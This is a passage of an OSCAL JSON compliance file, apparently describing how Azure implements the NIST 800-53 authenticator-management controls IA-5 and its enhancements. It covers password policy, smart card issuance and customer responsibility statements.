statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1213539c-3d1e-442b-bcbf-52cc69a9cb8f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5","statements":[{"uuid":"bdccd6b2-9e8d-4fd7-a46c-9b80dbe57bae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.a","by-components":[{"uuid":"7009c19e-aefb-4af9-af00-8d50f8be9c33","export":{"provided":[{"uuid":"0d9c025e-8ad7-4466-8263-066f80d9a3a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-019"}],"description":"For personnel supporting Azure services, user accounts within Azure domains tie to accounts of existing Microsoft personnel using their unique Microsoft CorpNet aliases. CorpNet and Azure access are provisioned and managed using separate account management tools. CorpNet account management, using MyAccess, cannot provide access to Azure - it can only provide access to AD security groups that the Azure account management tool, OneIdentity, leverages. The alias is consistent across all of a user's accounts._x000D_ _x000D_ _x000D_ _x000D_ Azure utilizes the AME and GME domains for access to the Azure environment. These domains are specific to the environment._x000D_ _x000D_ The identities of accounts are verified during the account request process, where initial authenticator distribution information for new Azure domain accounts are sent to the user's CorpNet e-mail address. Initial authenticator distribution is only sent to the CorpNet e-mail account associated to the provisioning request, after manager approval has been received. Azure-issued smart cards are distributed in person by the C+AI Security smart card support team after confirming the identity of the individual receiving the smart card._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d9b9345a-d064-4d2b-8621-8c9a16a529ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-019"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator management and content.","provided-uuid":"0d9c025e-8ad7-4466-8263-066f80d9a3a9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"afaa1b97-fb98-4f56-a68b-00ca73bc146c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.b","by-components":[{"uuid":"ad14ec07-129d-428a-8740-bb5148214539","export":{"provided":[{"uuid":"4a1a99d4-a106-43ce-82cc-bc99f613e1e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-020"}],"description":"At the time of initial account creation, Active Directory assigns a unique identification and random temporary password which meets Microsoft Corporate and Azure policy requirements. Active Directory maintains the unique identification associated with the account throughout the life of the account. Account identification is never repeated within Active Directory._x000D_ _x000D_ After receiving account creation approval from his/her manager, a new user receives an email from MyAccess regarding her or his request. This email has a URL pointer to a uniquely generated page to get a temporary password. This password is randomly generated and may be reset after one (1) day. The initial password generated is in accordance with Azure identity management baseline requirements including complexity and length requirements. After the smart card has been provided to the user, the C+AI Security Smart Card support staff sends an email with an initial PIN for the smart card that needs to be reset. Certain domains are passwordless - the smart card PIN is the authentication method for the account._x000D_ _x000D_"}],"responsibilities":[{"uuid":"90f34c40-b143-404f-89c5-32425ca5bd3d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-020"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator content.","provided-uuid":"4a1a99d4-a106-43ce-82cc-bc99f613e1e2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"403a6727-49c1-44cf-aa18-627f1fda6a27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.c","by-components":[{"uuid":"6bcce3c9-7ee0-42fa-8eb1-2dba0184dfe3","export":{"provided":[{"uuid":"82f2a7f7-8170-4622-be45-b79ca8572827","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-021"}],"description":"Issued passwords meet Microsoft Corporate and Azure policy requirements respectively for password complexity. Initial Smart Card certificates are generated by Core Services Engineering and Operations (CSEO). Azure implements a minimum password length of at least fifteen (15) characters and complexity of at least one (1) uppercase, one (1) lowercase, one (1) number, and one (1) special character in accordance with C+AI Security policy. Smart cards are FIPS-140-2 level 3 validated to ensure sufficient strength of hardware token. PINs are required to be at least four characters._x000D_ _x000D_"}],"responsibilities":[{"uuid":"2f2f585d-6cc9-4dc6-a353-69c3ba9b0fa0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-021"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator content and password strength.","provided-uuid":"82f2a7f7-8170-4622-be45-b79ca8572827"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"525a9586-691c-4bf9-a5b1-8943306b7a07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-022"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.d","by-components":[{"uuid":"7897879b-8081-4e27-aed9-babdb81c5655","export":{"provided":[{"uuid":"6cbf723a-f4eb-46fa-828a-7a0d43a61087","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-022"}],"description":"Initial authenticator distribution procedures are noted above. If an authenticator is lost or compromised, Azure administrators reset, re-issue, or revoke the authenticator as needed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"32eab046-53cc-40e6-bf3a-f3a1f46e2f7f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-022"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator management and content.","provided-uuid":"6cbf723a-f4eb-46fa-828a-7a0d43a61087"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9380fd72-6416-4550-808d-f88130d9c855","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-023"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.e","by-components":[{"uuid":"50f27af8-697a-43af-be7e-3fd3ca111e0e","export":{"provided":[{"uuid":"68727d43-ae86-479b-973b-6dc73b27b28a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-023"}],"description":"Default authentication credentials are often well known, easily discoverable, and present a significant security risk. Therefore, they are changed upon installation. The local administrator account is renamed and disabled. Default passwords are changed for the local administrator account and root accounts for network devices (including SNMP community strings)._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6f750372-e483-45a4-8238-8375c7783563","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-023"}],"description":"The customer is responsible for managing their authenticators, including changing default content of authenticators prior to deployment.","provided-uuid":"68727d43-ae86-479b-973b-6dc73b27b28a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dc15b194-b01a-458e-89b9-b2d860489b40","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-024"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.f","by-components":[{"uuid":"e412b927-1abd-4d96-b8d0-89a8adb90202","export":{"provided":[{"uuid":"1809fb29-0af6-4f76-96c3-97e39987606b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-024"}],"description":"Authenticator requirements for domain accounts are the following:_x000D_ _x000D_ * Enforce password history = 24 passwords remembered_x000D_ * Maximum password age = 70 days_x000D_ * Minimum password age = 1 day_x000D_ _x000D_ These requirements are defined and managed by C+AI Security. For smart cards, PINs are required to be at least four digits. PINs do not currently have maximum lifetimes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"21a99de5-11a1-4944-b094-f942ed1ac1ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-024"}],"description":"The customer is responsible for managing their authenticators, including the establishment of minimum and maximum lifetime restrictions and reuse conditions for authenticators.","provided-uuid":"1809fb29-0af6-4f76-96c3-97e39987606b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4b04bc27-0a41-4f2f-bbb3-715845c2e890","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-025"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.g","by-components":[{"uuid":"9c300514-e87f-4097-bc6b-e6a77ce45249","export":{"provided":[{"uuid":"a6df12cc-8683-42f8-ba30-77ace2a7f412","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-025"}],"description":"Passwords must be changed every seventy (70) days. This is defined within Identity Management Baseline. This is enforced through Azure Active Directory domain policy settings. Azure considers the incremental risk between 70-day password resets and 60-day password reset values to be minimal._x000D_ _x000D_ Azure implements strong password complexity, password expiration, password history, account lockout, and minimum password length per Microsoft Security Standards. Additionally, the use of multifactor authentication further provides strong security controls against credential guessing attacks. Azure considers these mitigating factors sufficient to address the incremental risk between Azure and the required values for password expiration._x000D_ _x000D_ For smart cards, PINs are required to be at least four digits. PINs do not currently have maximum lifetimes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ccdf068d-323d-48bc-9681-c48b53743d7f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-025"}],"description":"The customer is responsible for managing their authenticators, including changing and refreshing authenticators, and the corresponding time period after which an update is required for each authenticator type.","provided-uuid":"a6df12cc-8683-42f8-ba30-77ace2a7f412"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"de029885-07a6-444b-a26f-0731507d62ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-026"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.h","by-components":[{"uuid":"ecefff04-1d43-460a-8885-b889e31265f1","export":{"provided":[{"uuid":"33d04897-8893-4e7a-9037-967a99ef8c6b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-026"}],"description":"Azure utilizes obscuring mechanisms to protect authenticator content in accordance with the Active Directory settings, specifically the use of encryption to protect authenticator information for encryption and storage. This includes maintaining possession of individual authenticators, not loaning or sharing authenticators with others, and reporting lost or compromised authenticators immediately._x000D_ _x000D_"}],"responsibilities":[{"uuid":"80ff35c4-306a-4d0a-b6b7-e43163b451de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-026"}],"description":"The customer is responsible for managing and protecting their authenticator content from unauthorized disclosure and modification.","provided-uuid":"33d04897-8893-4e7a-9037-967a99ef8c6b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ea7e96c1-8e83-44e7-a0b8-5687ce5fc303","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.i","by-components":[{"uuid":"5c046efe-c0c7-4c0b-83c2-10880c6386ea","export":{"provided":[{"uuid":"ff64c6f5-d48d-45ea-9c23-178fa3206bdc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-027"}],"description":"Per the Microsoft Security Program Policy, authenticators must not be shared or revealed to anyone other than the authorized user. Additionally, authenticators must be promptly changed if they are suspected of being known by unauthorized individuals. Authenticators must not be written down or stored in readable form batch files, automatic log-in scripts, software macros, terminal function keys, in computers without access control, or in other locations where unauthorized persons might discover them and must be masked or encrypted both in storage and transmission. Azure utilizes credential scanning software to review Microsoft source code for unencrypted credentials, and implements Azure Storage automatic encryption for data at rest and HTTPS/TLS 1.2 everywhere for data in transit._x000D_ _x000D_"}],"responsibilities":[{"uuid":"bf38ab7d-3c93-44eb-b1ab-be7b87e0f6d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-027"}],"description":"The customer is responsible for managing their authenticators, including requiring individuals to take, and devices to implement, specific security safeguards to protect authenticators.","provided-uuid":"ff64c6f5-d48d-45ea-9c23-178fa3206bdc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6526469d-711c-4387-b057-cc66d1cd7395","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.1","statements":[{"uuid":"5a5bcc08-5542-468f-b1d8-fcea45ac8ed8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.a","by-components":[{"uuid":"fcb602ba-b3d9-4b05-8811-87a7dec31445","export":{"provided":[{"uuid":"06160294-e4b6-40bb-95f3-2595d580d358","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-028"}],"description":"The Azure AD Identity Protection team constantly analyzes Azure AD security telemetry data looking for commonly used weak or compromised passwords. Specifically, the analysis looks for base terms that often are used as the basis for weak passwords. When weak terms are found, they're added to the global banned password list. The contents of the global banned password list aren't based on any external data source, but on the results of Azure AD security telemetry and analysis."}],"responsibilities":[{"uuid":"074930f7-427a-4f03-8c0f-e369a4083fd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-028"}],"description":"The customer is responsible for maintaining a list of commonly-used, expected, or compromised passwords and updating the list regularly and when organizational passwords are suspected to have been compromised directly or indirectly.","provided-uuid":"06160294-e4b6-40bb-95f3-2595d580d358"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"de7b11ca-e0c1-4fb3-858d-3d87cb834c00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.b","by-components":[{"uuid":"1a7931fb-ca3a-47ad-8836-7c00e8f13864","export":{"provided":[{"uuid":"ca1c4fcf-c00c-4322-82a2-f410d58a4bc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-029"}],"description":"When a password is changed or reset for any user in an Azure AD tenant, the current version of the global banned password list is used to validate the strength of the password. This validation check results in stronger passwords for all Azure AD customers."}],"responsibilities":[{"uuid":"67ffb823-618f-49df-a34d-420f55bf34ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-029"}],"description":"The customer is responsible for verifying, when created or updated, that the passwords are not found on the list of commonly-used, expected, or compromised passwords in IA-5(1)(a).","provided-uuid":"ca1c4fcf-c00c-4322-82a2-f410d58a4bc7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"88de2efd-80ce-4c4a-92b5-e08aea67978c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.c","by-components":[{"uuid":"e65a5373-2114-4183-b9df-42dde8993897","export":{"provided":[{"uuid":"55491183-d001-4c3e-ad00-bb2199b8291d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-030"}],"description":"Where passwords exist, Azure applies cryptographic protection to all password in transit. This is a built-in function of Active Directory. Azure leverages HTTPS and TLS 1.2/1.3 protocols for data in transit encryptions."}],"responsibilities":[{"uuid":"0d6ba2f7-f9cc-4ecd-94eb-64e2b3a6bba4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-030"}],"description":"The customer is responsible for ensuring passwords are transmitted only over cryptographically-protected channels.","provided-uuid":"55491183-d001-4c3e-ad00-bb2199b8291d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0005982b-d2ca-4525-86a8-d2c96aa38db5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.d","by-components":[{"uuid":"88a61fcb-4910-43e0-80c9-f2b2800ecf43","export":{"provided":[{"uuid":"10a0032d-f7ba-435b-b792-639612326488","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-031"}],"description":"Where passwords exist, Azure applies cryptographic protection to all passwords in transmission. This is a built-in function of Active Directory."}],"responsibilities":[{"uuid":"13f84eb4-e195-428d-9049-abe0a3ebd08f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-031"}],"description":"The customer is responsible for ensuring passwords are stored using approved cryptographic protections.","provided-uuid":"10a0032d-f7ba-435b-b792-639612326488"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"993e421b-c391-4d05-a56b-0646824b49a2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.e","by-components":[{"uuid":"26ced37f-2999-4b07-8e75-5a652b3f4f3e","export":{"provided":[{"uuid":"11f72fce-9ec0-4151-898d-6d1c4d6db063","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-032"}],"description":"Where passwords exist, during account creation and recovery, the user is provided with a randomly generated password that must be changed upon initial login."}],"responsibilities":[{"uuid":"dc165729-69d3-439e-aa37-010e03317dc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-032"}],"description":"The customer is responsible for requiring immediate selection of a new password upon account recovery.","provided-uuid":"11f72fce-9ec0-4151-898d-6d1c4d6db063"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"47a1f9b6-334e-44af-aa17-a20588371798","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.f","by-components":[{"uuid":"e57164a4-fd9d-452a-9d94-4158aa0850fd","export":{"provided":[{"uuid":"dda7e4e4-f015-4c55-a984-88643dcda499","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-033"}],"description":"Where passwords exist, Active Directory allows passwords and passphrases up to 128 characters in length, and allows the entire set of 95 printable ASCII characters."}],"responsibilities":[{"uuid":"6b52ea9b-ef45-45c9-abb7-fc9cb9937d3c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-033"}],"description":"The customer is responsible for allowing user selection of long passwords and passphrases, including spaces and all printable characters on customer deployed resources.","provided-uuid":"dda7e4e4-f015-4c55-a984-88643dcda499"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"011fd892-ab7e-477b-afab-f12c4a0f30e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.g","by-components":[{"uuid":"69bf722a-5df3-4f8c-a739-91f834bc2df6","export":{"provided":[{"uuid":"f22597dd-9706-4acd-84ac-a50e10bd0384","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-034"}],"description":"Where passwords are used, Azure uses Active Directory to determine if password authenticators are sufficiently strong to satisfy the password length, complexity, rotation and lifetime restrictions. Active Directory ensures that the password authenticator strength at creation is sufficient."}],"responsibilities":[{"uuid":"bb5954a5-da8d-47d0-9616-2f3f5af46405","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-034"}],"description":"The customer is responsible for employing automated tools to assist the user in selecting strong password authenticators on customer deployed resources.","provided-uuid":"f22597dd-9706-4acd-84ac-a50e10bd0384"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7ec9c74c-cba3-4d70-84f6-12116e25d193","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.h","by-components":[{"uuid":"dde07fff-a105-4c93-abed-65343a65ac79","export":{"provided":[{"uuid":"d1ed4656-0a63-4c0f-bc6a-5cf626359130","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-035"}],"description":"Azure requires multifactor authentication for all access. Exceptions exist for assets or accounts that are unable to support smart card authentication, including local accounts and certain network devices. Where passwords exist, Azure exceeds Microsoft requirements and implements a minimum password length of at least fifteen (15) characters and complexity of at least one (1) uppercase, one (1) lowercase, one (1) number, and one (1) special character in accordance with C+AI Security policy."}],"responsibilities":[{"uuid":"7dbfaa2b-8187-402a-b196-98c143469d67","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-035"}],"description":"The customer is responsible for enforcing password composition and complexity rules on customer deployed resources.","provided-uuid":"d1ed4656-0a63-4c0f-bc6a-5cf626359130"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c52d0ecf-105a-4645-a667-edb3fe20d6d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.2","statements":[{"uuid":"c68e1fc6-963e-46d7-87fc-296b2bf0d3eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-037"}],"statement-id":"ia-5.2_smt.a","by-components":[{"uuid":"3619c524-0231-49af-a8ed-c88f736779e1","export":{"provided":[{"uuid":"29c04531-bbfb-4262-9d57-bb9aa03180df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-036"}],"description":"Microsoft protects private keys by enforcing appropriate and authorized access restrictions."},{"uuid":"4ffaa4a7-ada0-40f2-949e-d8c271eeb4fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-037"}],"description":"Smart card certificates include user information for the purposes of mapping the smart card identity to the Active Directory account of the card holder."}],"responsibilities":[{"uuid":"bfd606b9-21aa-487d-ae74-1928bb18346d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-036"}],"description":"The customer is responsible for employing PKI-based authentication and enforcing authorized access to private keys within customer-deployed resources.","provided-uuid":"29c04531-bbfb-4262-9d57-bb9aa03180df"},{"uuid":"eb3347e1-2b54-4b94-bc5a-410a543c074b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-037"}],"description":"The customer is responsible for employing PKI-based authentication with the ability to map each authenticated identity to the account of the corresponding individual or group within customer-deployed resources.","provided-uuid":"4ffaa4a7-ada0-40f2-949e-d8c271eeb4fa"}]},"description":"See inheritance and customer responsibility 